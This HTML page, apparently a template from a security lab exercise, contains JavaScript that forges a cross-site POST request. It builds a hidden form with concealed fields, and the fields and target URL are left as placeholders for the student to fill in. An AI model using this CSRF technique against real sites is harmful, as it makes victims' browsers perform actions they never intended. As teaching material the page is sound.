<html>
<body>

<h1> This page forges an HTTP POST request. </h1>

<script>

  function post(url, fields) {
    //--------------------------//
	  // create a <form> element
    //--------------------------//
	  var p = document.createElement('form');
    //--------------------------//
	  // construct the form
    //--------------------------//
	  p.action = url;
	  p.innerHTML = fields;
	  p.target = '_self';
	  p.method = 'post';
    //--------------------------//
	  //append the form to the current page.
    //--------------------------//
	  document.body.appendChild(p);
    //--------------------------//
	  //submit the form
    //--------------------------//
	  p.submit();
  }

  function csrf_hack() {
	  var fields;
    //-------------------------------------------------------------------------//
	  // The following are form entries that need to be filled out by attackers. 
	  // The entries are made hidden, so the victim won't be able to see them.
    //-------------------------------------------------------------------------//
	  fields += "<input type='hidden' name='name' value='alice'>";
	  fields += "<input type='hidden' name='company' value='GOOGLE'>";
    // TODO: Fill in the -fields- variable
    //    ...
    //    ...
    //-------------------------------------------------------------------------//
    // Done? Not yet, just post it ....
    //-------------------------------------------------------------------------//
	  post('http://www.someExampleLink.com/xyz.php?action=???',fields);
  }

</script>

<input type="button" value="click me" onclick="csrf_hack()">

</body>
</html>
